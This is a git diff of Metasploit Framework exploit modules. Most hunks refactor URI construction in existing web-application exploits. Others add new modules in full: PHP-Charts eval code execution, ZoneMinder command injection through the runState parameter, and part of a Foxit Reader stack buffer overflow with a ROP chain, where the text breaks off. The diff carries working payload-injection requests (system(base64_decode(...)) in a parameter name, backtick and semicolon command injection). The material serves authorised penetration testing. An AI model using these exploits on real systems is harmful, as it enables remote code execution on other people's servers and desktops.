@@ -287,7 +283,7 @@ def openx_upload_banner(uri_base, cookie, adv_id, camp_id, code_img)
# Ugh, now we have to get the banner id!
res = send_request_raw(
{
- 'uri' => uri_base + "admin/campaign-banners.php?clientid=#{adv_id}&campaignid=#{camp_id}",
+ 'uri' => normalize_uri(uri_base, "admin/campaign-banners.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}",
'method' => 'GET',
'headers' =>
{
@@ -319,7 +315,7 @@ def openx_find_banner_filename(uri_base, cookie, adv_id, camp_id, ban_id)
# Ugh, now we have to get the banner name too!
res = send_request_raw(
{
- 'uri' => uri_base + "admin/banner-edit.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
+ 'uri' => normalize_uri(uri_base, "admin/banner-edit.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'method' => 'GET',
'headers' =>
{
@@ -338,7 +334,7 @@ def openx_find_banner_filename(uri_base, cookie, adv_id, camp_id, ban_id)
def openx_banner_delete(uri_base, cookie, adv_id, camp_id, ban_id)
res = send_request_raw(
{
- 'uri' => uri_base + "admin/banner-delete.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
+ 'uri' => normalize_uri(uri_base, "admin/banner-delete.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'method' => 'GET',
'headers' =>
{
diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb
index 66fa7d4ca279..7ca3dc9b5899 100644
--- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb
+++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb
@@ -78,7 +78,7 @@ def exploit
print_status("Sending file save request")
response = send_request_raw({
- 'uri' => normalize_uri(datastore['URI']) + "/" + "admin/file_manager.php/login.php?action=save",
+ 'uri' => normalize_uri(datastore['URI'], "admin/file_manager.php/login.php") + "?action=save",
'method' => 'POST',
'data' => data,
'headers' =>
@@ -101,7 +101,7 @@ def exploit
response = send_request_raw({
# Allow findsock payloads to work
'global' => true,
- 'uri' => normalize_uri(datastore['URI']) + "/" + File.basename(filename)
+ 'uri' => normalize_uri(datastore['URI'], File.basename(filename))
}, timeout)
handler
diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb
new file mode 100644
index 000000000000..50159d7bc596
--- /dev/null
+++ b/modules/exploits/unix/webapp/php_charts_exec.rb
@@ -0,0 +1,119 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "PHP-Charts v1.0 PHP Code Execution Vulnerability",
+ 'Description' => %q{
+ This module exploits a PHP code execution vulnerability in php-Charts
+ version 1.0 which could be abused to allow users to execute arbitrary
+ PHP code under the context of the webserver user. The 'url.php' script
+ calls eval() with user controlled data from any HTTP GET parameter name.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'AkaStep', # Discovery and PoC
+ 'Brendan Coles ' # msf exploit
+ ],
+ 'References' =>
+ [
+ ['OSVDB', '89334'],
+ ['BID', '57448'],
+ ['EDB', '24201']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d\x22",
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python',
+ }
+ },
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => "none"
+ },
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jan 16 2013",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path to the web application', '/php-charts_v1.0/']),
+ ], self.class)
+ end
+
+ def check
+
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+ peer = "#{rhost}:#{rport}"
+ fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
+ code = Rex::Text.uri_encode(Rex::Text.encode_base64("echo #{fingerprint}"))
+ rand_key_value = rand_text_alphanumeric(rand(10)+6)
+
+ # send check
+ print_status("#{peer} - Sending check")
+ begin
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
+ })
+
+ if res and res.body =~ /#{fingerprint}/
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ print_error("#{peer} - Connection failed")
+ end
+ return Exploit::CheckCode::Unknown
+
+ end
+
+ def exploit
+
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+ @peer = "#{rhost}:#{rport}"
+ code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
+ rand_key_value = rand_text_alphanumeric(rand(10)+6)
+
+ # send payload
+ print_status("#{@peer} - Sending payload (#{code.length} bytes)")
+ begin
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
+ })
+ if res and res.code == 500
+ print_good("#{@peer} - Payload sent successfully")
+ else
+ fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+ end
+
+ end
+end
diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
index 9526b9f2fa63..e6fcd817266d 100644
--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -54,12 +54,11 @@ def initialize(info = {})
end
def check
- uri = normalize_uri(target_uri.path)
- uri << '/' if uri[-1,1] != '/'
+ uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
- 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php"
+ 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php")
})
if res and res.code == 200
@@ -83,7 +82,7 @@ def exploit
res = send_request_cgi({
'method' => 'POST',
- 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php",
+ 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"),
'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
'data' => post_data.to_s
})
@@ -96,7 +95,7 @@ def exploit
print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
res = send_request_cgi({
'method' => 'GET',
- 'uri' => "#{uri}wp-content/affiliate_images/#{$1}.php"
+ 'uri' => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php")
})
if res and res.code != 200
diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb
index 60dc44e64303..f19ece646e11 100644
--- a/modules/exploits/unix/webapp/phpbb_highlight.rb
+++ b/modules/exploits/unix/webapp/phpbb_highlight.rb
@@ -70,7 +70,7 @@ def find_topic
1.upto(32) do |x|
res = send_request_raw({
- 'uri' => normalize_uri(datastore['URI']) + '/viewtopic.php?topic=' + x.to_s,
+ 'uri' => normalize_uri(datastore['URI'], '/viewtopic.php') + '?topic=' + x.to_s,
}, 25)
if (res and res.body.match(/class="postdetails"/))
@@ -92,14 +92,14 @@ def exploit
return
else
- sploit = normalize_uri(datastore['URI']) + "/viewtopic.php?t=#{topic}&highlight="
+ sploit = normalize_uri(datastore['URI'], "/viewtopic.php") + "?t=#{topic}&highlight="
case target.name
when /Automatic/
req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"
res = send_request_raw({
- 'uri' => normalize_uri(datastore['URI']) + req
+ 'uri' => normalize_uri(datastore['URI'], req)
}, 25)
print_status("Trying to determine which attack method to use...")
diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb
index f215e4b11a46..55f894ffc361 100644
--- a/modules/exploits/unix/webapp/phpmyadmin_config.rb
+++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb
@@ -74,7 +74,7 @@ def initialize(info = {})
def exploit
# First, grab the session cookie and the CSRF token
print_status("Grabbing session cookie and CSRF token")
- uri = normalize_uri(datastore['URI']) + "/scripts/setup.php"
+ uri = normalize_uri(datastore['URI'], "/scripts/setup.php")
response = send_request_raw({ 'uri' => uri})
if !response
fail_with(Exploit::Failure::NotFound, "Failed to retrieve hash, server may not be vulnerable.")
@@ -101,7 +101,7 @@ def exploit
# Now that we've got the cookie and token, send the evil
print_status("Sending save request")
response = send_request_raw({
- 'uri' => normalize_uri(datastore['URI']) + "/scripts/setup.php",
+ 'uri' => normalize_uri(datastore['URI'], "/scripts/setup.php"),
'method' => 'POST',
'data' => data,
'cookie' => cookie,
@@ -120,7 +120,7 @@ def exploit
response = send_request_raw({
# Allow findsock payloads to work
'global' => true,
- 'uri' => normalize_uri(datastore['URI']) + "/config/config.inc.php"
+ 'uri' => normalize_uri(datastore['URI'], "/config/config.inc.php")
}, timeout)
handler
diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb
index 06af2b28c79d..4b5b2a474518 100644
--- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb
+++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb
@@ -63,7 +63,7 @@ def check
res = send_request_cgi(
{
'method' => 'GET',
- 'uri' => "#{base}/index.php",
+ 'uri' => normalize_uri("#{base}/index.php"),
'vars_get' =>
{
'c' => 'access',
diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb
index 83de69d3d734..9de06547ac8b 100644
--- a/modules/exploits/unix/webapp/redmine_scm_exec.rb
+++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb
@@ -55,7 +55,7 @@ def initialize(info = {})
def exploit
command = Rex::Text.uri_encode(payload.encoded)
- urlconfigdir = normalize_uri(datastore['URI']) + "/repository/annotate?rev=`#{command}`"
+ urlconfigdir = normalize_uri(datastore['URI'], "/repository/annotate") + "?rev=`#{command}`"
res = send_request_raw({
'uri' => urlconfigdir,
diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
index 6e1c95852ac0..07465ee23686 100644
--- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb
+++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
@@ -57,7 +57,7 @@ def initialize(info = {})
def check
res = send_request_raw({
- 'uri' => normalize_uri(datastore['URI']) + '/index.php'
+ 'uri' => normalize_uri(datastore['URI'], '/index.php')
}, 25)
if (res and res.body =~ /Simple PHP Blog (\d)\.(\d)\.(\d)/)
@@ -79,7 +79,7 @@ def check
def retrieve_password_hash(file)
res = send_request_raw({
- 'uri' => normalize_uri(datastore['URI']) + file,
+ 'uri' => normalize_uri(datastore['URI'], file)
}, 25)
if (res and res.message == "OK" and res.body)
@@ -94,7 +94,7 @@ def retrieve_password_hash(file)
def create_new_password(user, pass)
res = send_request_cgi({
- 'uri' => normalize_uri(datastore['URI']) + '/install03_cgi.php',
+ 'uri' => normalize_uri(datastore['URI'], '/install03_cgi.php'),
'method' => 'POST',
'data' => "user=#{user}&pass=#{pass}",
}, 25)
@@ -109,7 +109,7 @@ def create_new_password(user, pass)
def retrieve_session(user, pass)
res = send_request_cgi({
- 'uri' => normalize_uri(datastore['URI']) + "/login_cgi.php",
+ 'uri' => normalize_uri(datastore['URI'], "/login_cgi.php"),
'method' => 'POST',
'data' => "user=#{user}&pass=#{pass}",
}, 25)
@@ -139,7 +139,7 @@ def upload_page(session, dir, newpage, contents)
data << "\r\n--#{boundary}--"
res = send_request_raw({
- 'uri' => normalize_uri(datastore['URI']) + "/upload_img_cgi.php",
+ 'uri' => normalize_uri(datastore['URI'], "/upload_img_cgi.php"),
'method' => 'POST',
'data' => data,
'headers' =>
@@ -160,7 +160,7 @@ def upload_page(session, dir, newpage, contents)
def reset_original_password(hash, scriptlocation)
res = send_request_cgi({
- 'uri' => normalize_uri(datastore['URI']) + scriptlocation,
+ 'uri' => normalize_uri(datastore['URI'], scriptlocation),
'method' => 'POST',
'data' => "hash=" + hash,
}, 25)
@@ -177,7 +177,7 @@ def delete_file(file)
delete_path = "/comment_delete_cgi.php?y=05&m=08&comment=.#{file}"
res = send_request_raw({
- 'uri' => normalize_uri(datastore['URI']) + delete_path,
+ 'uri' => normalize_uri(datastore['URI'], delete_path),
}, 25)
if (res)
diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
index 40311c1ed3f7..9f8aadb6213c 100644
--- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -75,7 +75,6 @@ def on_new_session(client)
def exploit
base = normalize_uri(target_uri.path)
- base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
username = datastore['USERNAME']
@@ -89,7 +88,7 @@ def exploit
res = send_request_cgi(
{
- 'uri' => "#{base}index.php" ,
+ 'uri' => normalize_uri(base, "index.php") ,
'method' => "POST",
'headers' =>
{
diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
index a051069c938e..99f57424e15e 100644
--- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
@@ -58,7 +58,7 @@ def initialize(info = {})
def check
res = send_request_raw(
{
- 'uri' => normalize_uri(datastore['URI']) + "/tiki-index.php",
+ 'uri' => normalize_uri(datastore['URI'], "/tiki-index.php"),
'method' => 'GET',
'headers' =>
{
@@ -155,8 +155,7 @@ def exploit
# when exploiting this vulnerability :)
#
def build_uri(f_val)
- uri = normalize_uri(datastore['URI'])
- uri << "/tiki-graph_formula.php?"
+ uri = normalize_uri(datastore['URI'], "/tiki-graph_formula.php?")
# Requirements:
query = ''
diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
index c2f500447e3d..7fac9b73f102 100644
--- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
@@ -59,7 +59,7 @@ def initialize(info = {})
def check
res = send_request_raw(
{
- 'uri' => normalize_uri(datastore['URI']) + "/tiki-index.php",
+ 'uri' => normalize_uri(datastore['URI'], "/tiki-index.php"),
'method' => 'GET'
}, 25)
@@ -82,7 +82,7 @@ def exploit
end
def create_temp_file
- url_jhot = normalize_uri(datastore['URI']) + "/jhot.php"
+ url_jhot = normalize_uri(datastore['URI'], "/jhot.php")
scode =
"\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" +
@@ -153,7 +153,7 @@ def create_temp_file
end
def exe_command(cmd)
- url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php"
+ url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php")
res = send_request_raw({
'uri' => url_config,
@@ -182,7 +182,7 @@ def exe_command(cmd)
end
def remove_temp_file
- url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php"
+ url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php")
res = send_request_raw({
'uri' => url_config,
diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
index f6908cbf6d02..bb5f625e5670 100644
--- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
@@ -78,7 +78,7 @@ def on_new_session(client)
end
def exploit
- base = normalize_uri(target_uri.path)
+ base = target_uri.path
base << '/' if base[-1, 1] != '/'
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
@@ -86,7 +86,7 @@ def exploit
print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
res = send_request_cgi(
- 'uri' => "#{base}tiki-rss_error.php"
+ 'uri' => normalize_uri(base, "tiki-rss_error.php")
)
if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/
@@ -112,7 +112,7 @@ def exploit
res = send_request_cgi(
{
- 'uri' => "#{base}tiki-print_multi_pages.php",
+ 'uri' => normalize_uri(base, "tiki-print_multi_pages.php"),
'method' => 'POST',
'vars_post' => {
'printpages' => printpages
@@ -129,7 +129,7 @@ def exploit
res = send_request_cgi(
{
'method' => 'GET',
- 'uri' => "#{base + @upload_php}",
+ 'uri' => normalize_uri(base, @upload_php),
'headers' => {
'Cmd' => Rex::Text.encode_base64(payload.encoded)
}
diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb
index 42bccd1b2f70..98b628b9f868 100644
--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -61,8 +61,8 @@ def initialize(info = {})
#
def check
test_file = rand_text_alphanumeric(8+rand(8))
- cmd_base = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers?rev='
- test_url = normalize_uri(datastore['URI']) + '/' + test_file
+ cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers?rev=')
+ test_url = normalize_uri(datastore['URI'], test_file)
# first see if it already exists (it really shouldn't)
res = send_request_raw({
@@ -109,7 +109,7 @@ def exploit
rev = rand_text_numeric(1+rand(5))
rev << ' `' + payload.encoded + '`#'
- query_str = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers'
+ query_str = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
query_str << '?rev='
query_str << Rex::Text.uri_encode(rev)
diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb
index 741f7eef42a5..b27a6f4e2366 100644
--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -56,8 +56,8 @@ def initialize(info = {})
def check
content = rand_text_alphanumeric(16+rand(16))
test_file = rand_text_alphanumeric(8+rand(8))
- cmd_base = normalize_uri(datastore['URI']) + '/view/Main/WebSearch?search='
- test_url = normalize_uri(datastore['URI']) + '/view/Main/' + test_file
+ cmd_base = normalize_uri(datastore['URI'], '/view/Main/WebSearch?search=')
+ test_url = normalize_uri(datastore['URI'], '/view/Main/', test_file)
# first see if it already exists (it really shouldn't)
res = send_request_raw({
@@ -105,13 +105,13 @@ def exploit
search = rand_text_alphanumeric(1+rand(8))
search << "';" + payload.encoded + ";#\'"
- query_str = normalize_uri(datastore['URI']) + '/view/Main/WebSearch'
+ query_str = normalize_uri(datastore['URI'], '/view/Main/WebSearch')
query_str << '?search='
query_str << Rex::Text.uri_encode(search)
res = send_request_cgi({
'method' => 'GET',
- 'uri' => query_str,
+ 'uri' => query_str,
}, 25)
if (res and res.code == 200)
diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
new file mode 100644
index 000000000000..ef6906721ed8
--- /dev/null
+++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
@@ -0,0 +1,147 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'ZoneMinder Video Server packageControl Command Execution',
+ 'Description' => %q{
+ This module exploits a command execution vulnerability in ZoneMinder Video
+ Server version 1.24.0 to 1.25.0 which could be abused to allow
+ authenticated users to execute arbitrary commands under the context of the
+ web server user. The 'packageControl' function in the
+ 'includes/actions.php' file calls 'exec()' with user controlled data
+ from the 'runState' parameter.
+ },
+ 'References' =>
+ [
+ ['URL', 'http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/'],
+ ],
+ 'Author' =>
+ [
+ 'Brendan Coles ', # Discovery and exploit
+ ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic telnet python perl bash',
+ },
+ },
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => "Jan 22 2013"
+ ))
+
+ register_options([
+ OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),
+ OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),
+ OptString.new('TARGETURI', [true, 'The path to the web application', '/zm/'])
+ ], self.class)
+ end
+
+ def check
+
+ peer = "#{rhost}:#{rport}"
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+ cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
+ data = "action=login&view=version&username=#{user}&password=#{pass}"
+
+ # login and retrieve software version
+ print_status("#{peer} - Authenticating as user '#{user}'")
+ begin
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "#{base}index.php",
+ 'cookie' => "#{cookie}",
+ 'data' => "#{data}",
+ })
+ if res and res.code == 200
+ if res.body =~ /ZM - Login<\/title>/
+ print_error("#{peer} - Authentication failed")
+ return Exploit::CheckCode::Unknown
+ elsif res.body =~ /v1.2(4\.\d+|5\.0)/
+ return Exploit::CheckCode::Appears
+ elsif res.body =~ /<title>ZM/
+ return Exploit::CheckCode::Detected
+ end
+ end
+ return Exploit::CheckCode::Safe
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
+ print_error("#{peer} - Connection failed")
+ end
+ return Exploit::CheckCode::Unknown
+
+ end
+
+ def exploit
+
+ @peer = "#{rhost}:#{rport}"
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+ cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+ data = "action=login&view=postlogin&username=#{user}&password=#{pass}"
+ command = Rex::Text.uri_encode(payload.encoded)
+
+ # login
+ print_status("#{@peer} - Authenticating as user '#{user}'")
+ begin
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "#{base}index.php",
+ 'cookie' => "#{cookie}",
+ 'data' => "#{data}",
+ })
+ if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
+ fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+ end
+ print_good("#{@peer} - Authenticated successfully")
+
+ # send payload
+ print_status("#{@peer} - Sending payload (#{command.length} bytes)")
+ begin
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "#{base}index.php",
+ 'data' => "view=none&action=state&runState=start;#{command}%26",
+ 'cookie' => "#{cookie}"
+ })
+ if res and res.code == 200
+ print_good("#{@peer} - Payload sent successfully")
+ else
+ fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+ end
+
+ end
+
+end
diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb
index 0a64ebeae492..e51ecadf6dce 100644
--- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb
+++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb
@@ -25,8 +25,7 @@ def initialize(info = {})
'Author' =>
[
'Unknown', # 0day found in the wild
- '@sn0wfl0w', # initial analysis
- '@vicheck', # initial analysis
+ 'sn0wfl0w', # initial analysis, also @vicheck on twitter
'jduck' # Metasploit module
],
'References' =>
diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
new file mode 100644
index 000000000000..79df79fbcfc8
--- /dev/null
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -0,0 +1,195 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ Rank = NormalRanking
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Foxit Reader Plugin URL Processing Buffer Overflow",
+ 'Description' => %q{
+ This module exploits a vulnerability in the Foxit Reader Plugin, it exists in
+ the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,
+ overly long query strings within URLs can cause a stack-based buffer overflow,
+ which can be exploited to execute arbitrary code. This exploit has been tested
+ on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281
+ (npFoxitReaderPlugin.dll version 2.2.1.530).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod <rgod[at]autistici.org>', # initial discovery and poc
+ 'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module
+ 'juan vazquez', # metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'OSVDB', '89030' ],
+ [ 'BID', '57174' ],
+ [ 'EDB', '23944' ],
+ [ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ],
+ [ 'URL', 'http://secunia.com/advisories/51733/' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 2000,
+ 'DisableNops' => true
+ },
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => "process",
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # npFoxitReaderPlugin.dll version 2.2.1.530
+ [ 'Automatic', {} ],
+ [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281',
+ {
+ 'Offset' => 272,
+ 'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin
+ 'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin
+ :rop => :win7_rop_chain
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jan 7 2013",
+ 'DefaultTarget' => 0))
+ end
+
+ def get_target(agent)
+ #If the user is already specified by the user, we'll just use that
+ return target if target.name != 'Automatic'
+
+ #Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
+ nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+ firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || ''
+
+ case nt
+ when '5.1'
+ os_name = 'Windows XP SP3'
+ when '6.0'
+ os_name = 'Windows Vista'
+ when '6.1'
+ os_name = 'Windows 7'
+ end
+
+ if os_name == 'Windows 7' and firefox =~ /18/
+ return targets[1]
+ end
+
+ return nil
+ end
+
+ def junk
+ return rand_text_alpha(4).unpack("L")[0].to_i
+ end
+
+ def nops
+ make_nops(4).unpack("N*")
+ end
+
+ # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)
+ def win7_rop_chain
+
+ # rop chain generated with mona.py - www.corelan.be
+ rop_gadgets =
+ [
+ 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]
+ 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
+ 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
+ 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
+ 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]
+ 0x41414141, # Filler (RETN offset compensation)
+ 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll]
+ 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]
+ 0x00001000, # 0x00001000-> edx
+ 0x1000d9ec, # XOR EDX, EDX # RETN
+ 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
+ junk,
+ 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]
